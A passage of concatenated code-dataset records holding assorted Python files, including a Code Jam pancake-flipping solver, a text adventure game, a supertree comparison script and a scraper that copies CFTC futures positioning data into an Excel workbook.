self.cfg=cfg=self.loadLayout()\n return [(k,v) for k, v in cfg.items() if not k.startswith('_')]\n\n def keys(self):\n \n global cfg\n if 'cfg' in globals():\n return cfg.keys()\n else:\n \n cfg=self.loadLayout()\n return 
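# A small sketch of the lazy-load pattern behind get()/items()/keys()
# above, caching the parsed layout on the instance instead of mutating
# a module-level `cfg` global.
import json
from pathlib import Path

class LayoutCache:
    def __init__(self, layout_loc):
        self.layout_loc = Path(layout_loc)
        self._cfg = None  # parsed lazily on first access

    @property
    def cfg(self):
        if self._cfg is None:
            self._cfg = json.loads(self.layout_loc.read_text())
        return self._cfg

    def get(self, key, default=None):
        return self.cfg.get(key, default)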
cfg.keys()\n","sub_path":"ui_layer/UiLayout.py","file_name":"UiLayout.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479010038","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('inputs',type=argparse.FileType('r'))\nparser.add_argument('output',type=argparse.FileType('w'))\nargs = parser.parse_args()\n\ndef swapsgn(sign):\n if sign == '+':\n return '-'\n else:\n return '+'\n\ndef rotate(l,lastid):\n if len(l) == 1:\n l[0] = swapsgn(l[0])\n else:\n for i in xrange(lastid,0,-1):\n l[i-1] = swapsgn(l[i-1])\n\ncase = 0\nnext(args.inputs)\nfor inp in args.inputs:\n inp = list(inp.rstrip('\\n'))\n count = 0\n count = 0\n while not all('+' == v for v in inp):\n lastid = len(inp) - inp[::-1].index('-')\n rotate(inp,lastid)\n count += 1\n case += 1\n args.output.write((\"Case #%i: %s\\n\")%(case,count))\n","sub_path":"codes/CodeJamCrawler/16_0_2/Richman/pancakes.py","file_name":"pancakes.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"521205759","text":"import argparse\nimport json\nimport codecs\nimport os\nimport itertools\nfrom collections import defaultdict\nfrom nltk import word_tokenize, sent_tokenize\nfrom string import punctuation\n\ndef main(datadir):\n\tmegadict = defaultdict(lambda: {})\n\tfor filename in os.listdir(datadir):\n\t\tsplit_name = filename.split('_')\n\t\tyear = split_name[0]\n\t\telection_type = split_name[1].split('.')[0]\n\t\tf = codecs.open(datadir + '/' + filename, 'r', encoding='utf-8')\n\t\tdata = json.load(f)\n\t\tf.close()\n\t\tfor name, v in dict.iteritems(data):\n\t\t\tfor date, text in dict.iteritems(v):\n\t\t\t\tsentences = sent_tokenize(\"\".join(text))\n\t\t\t\ttext = ''.join(sentences)\n\t\t\t\telection_name = name + \" \" + election_type + \" \" + year\n\t\t\t\tif election_name != \"Hillary Clinton republican 2008\":\n\t\t\t\t\tmegadict[election_name][date] = text\n\tnewf = codecs.open('full_text.json' , 'w', encoding='utf-8')\n\tnewf.write(json.dumps(megadict))\n\tnewf.close()\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datadir\", help=\"directory where dataset is located\", type=str)\n\targs = parser.parse_args()\n\n\tmain(args.datadir)\n\n\t#([A-Za-z ]*\\.){1,3} ?(?=\\[Laughter\\])","sub_path":"clean_data_formats/full_text.py","file_name":"full_text.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171958582","text":"#read in and set up \nread('../in_molluscs')\ninTrees = var.trees\nvar.trees = []\nMRP=func.readAndPop('mrpStrictConsTree.nex')\nMajR=func.readAndPop('mrpMajRuleConsTree.nex')\n#SR2008=func.readAndPop('SR2008_0_minprop0cons.nex')\nQPA=func.readAndPop('QPA_1_minprop50cons.nex')\nSPA=func.readAndPop('SPA_1_minprop50cons.nex')\nQPA.name='QPA'\nSPA.name='SPA'\nMRP.name='MRP'\nMajR.name='MajR'\na=func.readAndPop('SPA_1_minprop50cons.nex')\nQPA.taxNames=a.taxNames\nSPA.taxNames=a.taxNames\nMRP.taxNames=a.taxNames\nMajR.taxNames=a.taxNames\n\ntrees=[MRP, QPA,SPA]\n\n\ntt=Trees(trees=trees, taxNames=a.taxNames)\ntt.inputTreesToSuperTreeDistances(inTrees)\n\n#dm=tt.inputTreesToSuperTreeDistances(inTrees)\n\ndm = tt.topologyDistanceMatrix('scqdist')\ndm.writeNexus('qd_distances.nex')\n#paup execute rf_dist nj save\n\n\nfrom p4.supertreesupport import 
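# A compact restatement of the greedy flip loop in the pancakes record
# above: find the last '-', flip the prefix up to and including it,
# and repeat until the whole stack reads '+'.
def flips_needed(stack):
    stack, count = list(stack), 0
    while '-' in stack:
        last = len(stack) - stack[::-1].index('-')
        stack[:last] = ['+' if c == '-' else '-' for c in stack[:last]]
        count += 1
    return count

assert flips_needed('--+-') == 3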
SuperTreeSupport\nprint(\"%20s %6s %6s %6s %6s %6s\" % (' ', 'S', 'P', 'Q', 'R', 'V'))\nfor st in trees:\n \n sts = SuperTreeSupport(st, inTrees)\n \n sts.doSaveDecoratedTree = False\n sts.decoratedFilename='mytree.nex'\n sts.doSaveIndexTree=False\n sts.indexFilename='mytreeIndex.nex'\n sts.csvFilename='mytreeIndex.csv'\n sts.doDrawTree=False\n sts.verbose=0\n \n sts.superTreeSupport()\n print(\"%20s %6.2f %6.2f %6.2f %6.2f %6.2f\" % (st.name, sts.S, sts.P, sts.Q, sts.R, sts.V))\n \n\n\n\n\n\n\n","sub_path":"MOLLUSK_FINAL/B_inputreesupertreedist.py","file_name":"B_inputreesupertreedist.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"455999831","text":"from room import Room\nfrom player import Player\nfrom item import Item, LightSource\nimport textwrap\n\n# Declare game-wide \"constants\"\nchar_line_limit = 90\n\n# Declare global functions\n\nwrapper = textwrap.TextWrapper(width=char_line_limit, replace_whitespace=False)\ndef print_wrap(foo):\n if isinstance(foo, str):\n print(wrapper.fill(text=foo))\n else:\n print(wrapper.fill( text=str(foo) ))\n\n# Declare all the rooms\n\nrooms = {\n 'outside': Room(\"Outside Cave Entrance\", \"North of you, the cave mount beckons\", True),\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty passages run north and east.\"\"\", True),\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling into the darkness. Ahead to the north, a light flickers in the distance, but there is no way across the chasm.\"\"\", False),\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west to north. The smell of gold permeates the air.\"\"\", False),\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure chamber! Sadly, it has already been completely emptied by earlier adventurers. 
The only exit is to the south.\"\"\", False)\n}\n\n# Link rooms together\n\nrooms['outside'].n_to = rooms['foyer']\nrooms['foyer'].s_to = rooms['outside']\nrooms['foyer'].n_to = rooms['overlook']\nrooms['foyer'].e_to = rooms['narrow']\nrooms['overlook'].s_to = rooms['foyer']\nrooms['narrow'].w_to = rooms['foyer']\nrooms['narrow'].n_to = rooms['treasure']\nrooms['treasure'].s_to = rooms['narrow']\n\n# Populate rooms with items\nrooms['foyer'].add_item(Item(\"Potion\", \"You can drink this to boost your health.\"))\nrooms['foyer'].add_item(Item(\"Coins\", \"These can be used to buy stuff.\"))\nrooms['foyer'].add_item(LightSource(\"Lamp\", \"This burns oil for light.\"))\nrooms['outside'].add_item(Item(\"Stick\", \"A very crude weapon.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['narrow'].add_item(Item(\"Stick\", \"A very crude weapon.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['treasure'].add_item(Item(\"Rope\", \"Good for lots of things.\"))\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\npc = Player( rooms['outside'] )\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\nmove_error = \"You can't move in that direction!\\n\"\ncommand = None\n\nprint('')\nwhile command != \"q\":\n\n # Move the player if they just entered a movement direction, or tell them they can't.\n if command == \"north\" or command == \"n\":\n if pc.room.n_to:\n pc.room = pc.room.n_to\n else:\n print(move_error)\n elif command == \"south\" or command == \"s\":\n if pc.room.s_to:\n pc.room = pc.room.s_to\n else:\n print(move_error)\n elif command == \"east\" or command == \"e\":\n if pc.room.e_to:\n pc.room = pc.room.e_to\n else:\n print(move_error)\n elif command == \"west\" or command == \"w\":\n if pc.room.w_to:\n pc.room = pc.room.w_to\n else:\n print(move_error)\n\n # View inventory\n elif command == \"i\" or command == \"inv\" or command == \"inventory\":\n print_wrap( pc.display_items() )\n print(\"\")\n\n # Parse more complex commands as multiple words\n elif command:\n complex_command = command.split(' ', 1)\n\n if len(complex_command) == 2:\n verb = complex_command[0]\n noun = complex_command[1]\n\n if verb == \"take\" or verb == \"get\":\n print(pc.take_item( noun.capitalize() ))\n if verb == \"drop\":\n print(pc.drop_item( noun.capitalize() ))\n\n else:\n print(\"Command not understood.\\n\")\n \n if pc.can_see():\n print_wrap( pc.room )\n print_wrap( pc.room.display_items() )\n else:\n print(\"It's pitch black!\")\n\n command = input(\"What do you want to do? 
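# A hedged sketch replacing the movement if/elif chain in adv.py above
# with a table lookup, assuming Room exposes n_to/s_to/e_to/w_to as shown.
MOVES = {'n': 'n_to', 'north': 'n_to', 's': 's_to', 'south': 's_to',
         'e': 'e_to', 'east': 'e_to', 'w': 'w_to', 'west': 'w_to'}

def try_move(player, command, error="You can't move in that direction!\n"):
    attr = MOVES.get(command)
    if attr is None:
        return False  # not a movement command
    next_room = getattr(player.room, attr)
    if next_room:
        player.room = next_room
    else:
        print(error)
    return True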
\")\n print('')","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"426571805","text":"from bs4 import BeautifulSoup\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\n\nimport requests\nfrom openpyxl import load_workbook\nimport time\n\ndate=time.strftime(\"%m-%d-%y\")\n\nFILE = \"week89.xlsx\" # 2bd: better to rename as date\n\nINDIV_SHEETS = [\"CAD\", \"CHF\", \"GBP\", \"JPY\", \"EUR\", \"NZD\", \"USD\",\n \"AUD\", \"Nikkei\", \"Dow Jones\", \"Silver\", \"Gold\", \"Oil\"]\n\n# CHICAGO MERCANTILE EXCHANGE\nCURRENCIES = {\n \"CAD\" : 90741,\n \"CHF\" : 92741,\n \"GBP\" : 96742,\n \"YEN\" : 97741,\n \"EURO\" : 99741,\n \"NZD\" : 112741,\n \"AUD\" : 232741,\n \"Nikkei\" : 240741\n}\n\n# Chicago Board of Traders\nTRADES = {\n \"DJ\": 124603\n}\n\n# CHICAGO BOARD OF COMMODITIES\nCOMMODITIES = {\n \"SILVER\" : 84691,\n \"GOLD\" : 88691\n}\n\nICE ={\n \"USD\": 98662\n}\n\nNYME ={\n \"OIL\": 67651\n}\n\n\ndef get_row_count(sheet):\n \"\"\" Find next row to append in INDIV_SHEETS. number of\n non-null values in col C is used to update the next row. \"\"\"\n #some impropvement is to ensure doesnt double run\n count = 2 # cell value count starts at 2\n\n for cell in sheet['C']:\n if cell.value != None:\n count += 1\n return count\n\ndef update_each_sheet_NONCOMM(sheet, sheet_name, nc_long, nc_short, nc_long_week, nc_short_week, oi):\n \"\"\"Update up each sheet with NON-COMMERCIAL data\"\"\"\n row_count = get_row_count(sheet)\n\n list1_nc = [\"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"M\", \"N\", \"O\"]\n list2_nc = [\"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"L\", \"M\", \"N\"]\n\n column = {\"CAD\": list1_nc, \"CHF\": list1_nc, \"GBP\":list2_nc, \"JPY\":list2_nc, \"EUR\":list1_nc, \"NZD\":list2_nc, \"AUD\":list2_nc,\n \"Nikkei\":list2_nc, \"USD\":list1_nc, \"Dow Jones\":list2_nc, \"Silver\":list2_nc, \"Gold\":list2_nc, \"Oil\":list2_nc}\n\n # Select cells for updates, all strings\n cell1 = column[sheet_name][0]+str(row_count) #nc_long\n cell2 = column[sheet_name][1]+str(row_count) #nc_short\n cell3 = column[sheet_name][2]+str(row_count) #OI\n cell4 = column[sheet_name][3]+str(row_count) #long week\n cell5 = column[sheet_name][4]+str(row_count) #short week\n cell6 = column[sheet_name][5]+str(row_count) #real\n cell7 = column[sheet_name][6]+str(row_count) #net\n cell8 = column[sheet_name][7] + str(row_count) # ratio\n cell9 = column[sheet_name][8] + str(row_count) # % OI in long\n cell10 = column[sheet_name][9] + str(row_count) # % OI in short\n cell11 = column[sheet_name][10] + str(row_count) # %OI in net\n prev_net_cell = column[sheet_name][6]+str(row_count-1) # net previous row retrieved for value of net\n\n sheet[cell1] = nc_long\n sheet[cell2] = nc_short\n sheet[cell3] = oi\n sheet[cell4] = nc_long_week\n sheet[cell5] = nc_short_week\n\n real_pos_val = int(nc_long_week.replace(\",\", \"\")) - int(nc_short_week.replace(\",\", \"\"))\n sheet[cell6] = real_pos_val# real position\n\n # Net is previous net + current real pos\n net = sheet[prev_net_cell].value + real_pos_val\n sheet[cell7] = net\n # Ratio is %OI long (long divide by OI)/% OI short (short divide by OI)\n\n # bigger over small. 
-ve is short > long\n # if short > long, -ve and short over long\n float_nclong = float(nc_long.replace(\",\", \"\"))\n float_ncshort = float(nc_short.replace(\",\", \"\"))\n\n\n if float_nclong >= float_ncshort:\n ratio = float_nclong / float_ncshort\n else:\n ratio = (float_ncshort/ float_nclong)*-1\n\n sheet[cell8] = str('%.2f' % ratio)\n\n sheet[cell9] = str('%.2f' % (float_nclong/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell10] = str('%.2f' % (float_ncshort/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell11] = str('%.2f' %( net*100/float(oi.replace(\",\", \"\")))) + \"%\"\n return\n\ndef update_each_sheet_COMM(sheet, sheet_name, c_long, c_short, c_long_week, c_short_week, oi):\n \"\"\"Update up each individual sheet with COMMERCIAL data\"\"\"\n\n row_count = get_row_count(sheet) -1 # MINUS 1 because after updating non commm the row count returns the ROW\n #after the nonComm just updated\n\n\n #c_long, c_short, OI, long week, short week, real, net, ratio, % oi in long, % OI in shorts, %OI in net\n list1_c = [\"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"AC\", \"AD\", \"AE\"]\n list2_c = [\"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"AA\", \"AD\", \"AE\", \"AF\"]\n\n column = {\"CAD\": list2_c, \"CHF\": list2_c, \"GBP\":list1_c, \"JPY\":list1_c, \"EUR\":list2_c, \"NZD\":list1_c, \"AUD\":list1_c,\n \"Nikkei\":list1_c, \"USD\":list2_c, \"Dow Jones\":list1_c, \"Silver\":list1_c, \"Gold\":list1_c, \"Oil\":list1_c}\n\n\n # Select cells for updates, all strings\n cell1 = column[sheet_name][0]+str(row_count) #c_long\n cell2 = column[sheet_name][1]+str(row_count) #c_short\n cell3 = column[sheet_name][2]+str(row_count) #OI\n cell4 = column[sheet_name][3]+str(row_count) #long week\n cell5 = column[sheet_name][4]+str(row_count) #short week\n cell6 = column[sheet_name][5]+str(row_count) #real\n cell7 = column[sheet_name][6]+str(row_count) #net\n cell8 = column[sheet_name][7] + str(row_count) # ratio\n cell9 = column[sheet_name][8] + str(row_count) # % OI in long\n cell10 = column[sheet_name][9] + str(row_count) # % OI in short\n cell11 = column[sheet_name][10] + str(row_count) # %OI in net\n prev_net_cell = column[sheet_name][6]+str(row_count-1) # net previous row retrieved for value of net\n\n sheet[cell1] = c_long\n sheet[cell2] = c_short\n sheet[cell3] = oi\n\n sheet[cell4] = c_long_week\n sheet[cell5] = c_short_week\n\n real_pos_val = int(c_long_week.replace(\",\", \"\")) - int(c_short_week.replace(\",\", \"\"))\n sheet[cell6] = real_pos_val# real position\n\n # Net is previous net + current real pos\n net = sheet[prev_net_cell].value + real_pos_val\n sheet[cell7] = net\n # Ratio is %OI long (long divide by OI)/% OI short (short divide by OI)\n\n # bigger over small. 
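# A standalone sketch of the signed long/short ratio computed in both
# update functions above; it assumes both legs are nonzero, as the
# report rows being parsed are.
def signed_ratio(longs, shorts):
    longs, shorts = float(longs), float(shorts)
    return longs / shorts if longs >= shorts else -(shorts / longs)

assert signed_ratio(200, 100) == 2.0
assert signed_ratio(100, 200) == -2.0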
-ve is short > long\n # if short > long, -ve and short over long\n float_clong = float(c_long.replace(\",\", \"\"))\n float_cshort = float(c_short.replace(\",\", \"\"))\n\n if float_clong >= float_cshort:\n ratio = float_clong / float_cshort\n else:\n ratio = (float_cshort/ float_clong)*-1\n sheet[cell8] = '%.2f' % ratio\n sheet[cell9] = str('%.2f' % (float_clong/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell10] = str('%.2f' % (float_cshort/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n\n sheet[cell11] = str('%.2f' % (net*100/float(oi.replace(\",\", \"\")))) + \"%\"\n\n return\n\ndef update_dates(wb,date_string): #manually pass as arg\n \"\"\" Update date cells for all sheets \"\"\"\n columns = {\"CAD\": [\"B\", \"S\"], \"CHF\": [\"B\", \"S\"], \"GBP\":[\"A\", \"R\"], \"JPY\":[\"A\", \"R\"], \"EUR\":[\"B\", \"S\"], \"NZD\":[\"A\", \"R\"], \"AUD\":[\"A\", \"R\"],\n \"Nikkei\":[\"A\", \"R\"], \"USD\":[\"B\", \"S\"], \"Dow Jones\":[\"A\", \"R\"], \"Silver\":[\"A\", \"R\"], \"Gold\":[\"A\", \"R\"], \"Oil\":[\"A\", \"R\"]\n }\n\n wb['Main']['A1'] = date_string\n for sheet_name, col in columns.items():\n cell_nc = col[0] + str(get_row_count(wb[sheet_name])-1)\n wb[sheet_name][cell_nc] = date_string\n cell_c = col[1] + str(get_row_count(wb[sheet_name]) - 1)\n print(cell_c)\n wb[sheet_name][cell_c] = date_string\n\n\n return\n\n\ndef update_all_sheets(wb ,curr_dict):\n \"\"\" Calls functions to update each individual sheet with NON-COMM and COMM data \"\"\"\n for sheet_name in INDIV_SHEETS:\n\n dict_value = {\n \"CAD\":\"CAD\", \"CHF\":\"CHF\", \"GBP\":\"GBP\", \"JPY\":\"YEN\", \"EUR\":\"EURO\", \"NZD\":\"NZD\", \"AUD\":\"AUD\",\n \"Nikkei\":\"Nikkei\", \"USD\":\"USD\", \"Dow Jones\":\"DJ\", \"Silver\":\"SILVER\", \"Gold\":\"GOLD\", \"Oil\":\"OIL\" \n }# matches sheet_name to dict_name\n\n params=curr_dict[dict_value[sheet_name]]\n\n #sheet, sheet_name, nc_long, nc_short, nc_long_week, nc_short_week, oi)\n # ### CURR DICT KEY MIGHT NOT BESAME AS SHEETNAME\n # params => [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week ]\n\n update_each_sheet_NONCOMM(wb[sheet_name], sheet_name,params[0],params[1], params[5], params[6], params[4])\n #(sheet, sheet_name, c_long, c_short, c_long_week, c_short_week, oi\n\n update_each_sheet_COMM(wb[sheet_name], sheet_name,params[2],params[3], params[7], params[8], params[4])\n return\n\n\ndef get_dets(CAD, s): #2bd: CAD is a bad var name\n \"\"\" Parse HTML to retrieve data \"\"\"\n try:\n row_all = s.split(str(CAD))[1].split('Changes')[0].split('All')[1].split('Old')[0].replace(\":\", \"\")\n integers = row_all.split()\n oi = integers[0]\n nc_long = integers[1]\n nc_short = integers[2]\n c_long = integers[4]\n c_short = integers[5]\n this_week_row = s.split(str(CAD))[1].split('Changes')[1].split('Percent')[0].split(':')[4]\n integers2 = this_week_row.split()\n\n nc_long_week =integers2[0]\n nc_short_week =integers2[1]\n\n\n if len(integers2)== 7:\n c_long_week = integers2[3]\n c_short_week =integers2[4]\n else:\n raise\n return nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week\n except Exception as e:\n print(\"ERROR\")\n print(e)\n raise\n\n\ndef get_html(link):\n \"\"\" GET request to URL and returns text in HTML \"\"\"\n\n r = requests.get(link)\n soup = BeautifulSoup(r.content)\n data=soup.findAll('pre')\n return data[0].text\n\n\n\ndef main_sheet():\n \"\"\"\n Retrieves data from respective URLs and returns curr_dict which contains\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, 
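# A minimal sketch of get_html above with an explicit parser;
# BeautifulSoup(r.content) without one emits a warning and may pick a
# different parser per machine. timeout/raise_for_status are additions.
import requests
from bs4 import BeautifulSoup

def get_pre_text(link):
    resp = requests.get(link, timeout=30)
    resp.raise_for_status()
    soup = BeautifulSoup(resp.content, 'html.parser')
    return soup.find('pre').text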
nc_short_week, c_long_week, c_short_week\n for each item in CURRENCIES, TRADES, COMMODOTIES, ICE, NYME\n \"\"\"\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacmelf.htm')\n curr_dict = {}\n for c, val in CURRENCIES.items():\n\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacbtlf.htm')\n for c, val in TRADES.items():\n\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [ nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacmxlf.htm')\n for c, val in COMMODITIES.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short,oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deanybtlf.htm')\n for c, val in ICE.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short,oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deanymelf.htm')\n for c, val in NYME.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n print(curr_dict)\n return curr_dict\n\n\n\ndef insert_excel(curr_dict, date_string):\n \"\"\"\n Insert retrieved data in ALL SHEETS\n Saves File\n \"\"\"\n\n wb = load_workbook(filename=FILE)\n Main = wb['Main']\n\n #update main sheet\n #CANADA\n Main['D3'], Main['E3'], Main['H3'], Main['I3'], Main['L3'] = curr_dict[\"CAD\"][0], curr_dict[\"CAD\"][1], curr_dict[\"CAD\"][2], curr_dict[\"CAD\"][3], curr_dict[\"CAD\"][4]\n #update_each_sheet( wb['CHF'], curr_dict[\"CAD\"][0], curr_dict[\"CAD\"][1], curr_dict[\"CAD\"][2], curr_dict[\"CAD\"][3], curr_dict[\"CAD\"][4])\n #CHF\n\n Main['D4'], Main['E4'], Main['H4'], Main['I4'], Main['L4'] = curr_dict[\"CHF\"][0], curr_dict[\"CHF\"][1], curr_dict[\"CHF\"][2], curr_dict[\"CHF\"][3], curr_dict[\"CHF\"][4]\n #GBP\n Main['D5'], Main['E5'], Main['H5'], Main['I5'], Main['L5'] = curr_dict[\"GBP\"][0], curr_dict[\"GBP\"][1], curr_dict[\"GBP\"][2], curr_dict[\"GBP\"][3], curr_dict[\"GBP\"][4]\n #YEN\n Main['D6'], Main['E6'], Main['H6'], Main['I6'], Main['L6'] = curr_dict[\"YEN\"][0], curr_dict[\"YEN\"][1], curr_dict[\"YEN\"][2], curr_dict[\"YEN\"][3], curr_dict[\"YEN\"][4]\n #EURO\n Main['D7'], Main['E7'], Main['H7'], Main['I7'], Main['L7'] = curr_dict[\"EURO\"][0], curr_dict[\"EURO\"][1], curr_dict[\"EURO\"][2], curr_dict[\"EURO\"][3], curr_dict[\"EURO\"][4]\n #NZD\n Main['D8'], Main['E8'], Main['H8'], Main['I8'], Main['L8'] = curr_dict[\"NZD\"][0], curr_dict[\"NZD\"][1], curr_dict[\"NZD\"][2], curr_dict[\"NZD\"][3], curr_dict[\"NZD\"][4]\n #AUD\n Main['D9'], Main['E9'], Main['H9'], Main['I9'], Main['L9'] = curr_dict[\"AUD\"][0], curr_dict[\"AUD\"][1], curr_dict[\"AUD\"][2], curr_dict[\"AUD\"][3], 
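# A hedged sketch giving the nine-element lists stored in curr_dict
# above named fields, in the order used throughout the script.
from collections import namedtuple

Report = namedtuple('Report', 'nc_long nc_short c_long c_short oi '
                              'nc_long_week nc_short_week '
                              'c_long_week c_short_week')

row = Report('1', '2', '3', '4', '5', '6', '7', '8', '9')
assert row.oi == '5'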
curr_dict[\"AUD\"][4]\n #Nikkei\n Main['D10'], Main['E10'], Main['H10'], Main['I10'], Main['L10'] = curr_dict[\"Nikkei\"][0], curr_dict[\"Nikkei\"][1], curr_dict[\"Nikkei\"][2], curr_dict[\"Nikkei\"][3], curr_dict[\"Nikkei\"][4]\n #DJ\n Main['D11'], Main['E11'], Main['H11'], Main['I11'], Main['L11'] = curr_dict[\"DJ\"][0], curr_dict[\"DJ\"][1], curr_dict[\"DJ\"][2], curr_dict[\"DJ\"][3], curr_dict[\"DJ\"][4]\n #SILVER\n Main['D12'], Main['E12'], Main['H12'], Main['I12'], Main['L12'] = curr_dict[\"SILVER\"][0], curr_dict[\"SILVER\"][1], curr_dict[\"SILVER\"][2], curr_dict[\"SILVER\"][3], curr_dict[\"SILVER\"][4]\n #GOLD\n Main['D13'], Main['E13'], Main['H13'], Main['I13'], Main['L13'] = curr_dict[\"GOLD\"][0], curr_dict[\"GOLD\"][1], curr_dict[\"GOLD\"][2], curr_dict[\"GOLD\"][3], curr_dict[\"GOLD\"][4]\n #OIL\n Main['D14'], Main['E14'], Main['H14'], Main['I14'], Main['L14'] = curr_dict[\"OIL\"][0], curr_dict[\"OIL\"][1], curr_dict[\"OIL\"][2], curr_dict[\"OIL\"][3], curr_dict[\"OIL\"][4]\n\n #USD\n Main['D15'], Main['E15'], Main['H15'], Main['I15'], Main['L15'] = curr_dict[\"USD\"][0], curr_dict[\"USD\"][1], curr_dict[\"USD\"][2], curr_dict[\"USD\"][3], curr_dict[\"USD\"][4]\n\n # Update the other sheets\n update_all_sheets(wb, curr_dict)\n\n\n update_dates(wb, date)\n\n #only save when error free\n wb.save(FILE)\n\n return\n\nif __name__ == \"__main__\":\n curr_dict=main_sheet()\n insert_excel(curr_dict, date)\n\n\n\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":14464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"205010671","text":"from collections import Counter\nfrom typing import Any, Dict, Optional, Tuple\n\n\nMin = float\nMax = float\nAvg = float\nDistribution = Dict[Any, int]\nRange = str\n\n\ndef to_range(percentage: float, step: int) -> Range:\n lower = (int(percentage * 100) // step) * step\n upper = min(lower + step, 100)\n return f\"{lower} - {upper}\"\n\n\ndef extract_first_number_from_range(range_: str) -> int:\n return [int(s) for s in range_.split() if s.isdigit()][0]\n\n\ndef average_from_distribution(distribution) -> float:\n return sum(int(number) * frequency\n for number, frequency\n in distribution.items()) / \\\n sum(frequency\n for frequency\n in distribution.values())\n\n\ndef max_from_distribution(distribution) -> float:\n return max(int(number)\n for number\n in distribution.keys())\n\n\ndef min_from_distribution(distribution: Distribution) -> float:\n return min(int(number)\n for number\n in distribution.keys())\n\n\nStats = Tuple[Distribution, Optional[Tuple[Avg, Max, Min]]]\n\n\ndef stats_from_counter(counter: Counter) -> Stats:\n\n distribution = {\n score: count\n for score, count in counter.most_common()\n }\n\n if len(counter) > 0:\n\n first = counter.most_common()[0][0]\n\n if(isinstance(first, int)):\n max = max_from_distribution(distribution)\n min = min_from_distribution(distribution)\n avg = average_from_distribution(distribution)\n return distribution, (avg, max, min)\n\n return distribution, None\n","sub_path":"interference/util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"29414748","text":"from itertools import chain\n\nfrom qiskit import QuantumRegister, QuantumCircuit\nfrom qiskit.circuit import Gate\n\nfrom gates.beauregard.constant_adder import as_bits_reversed\n\n\ndef 
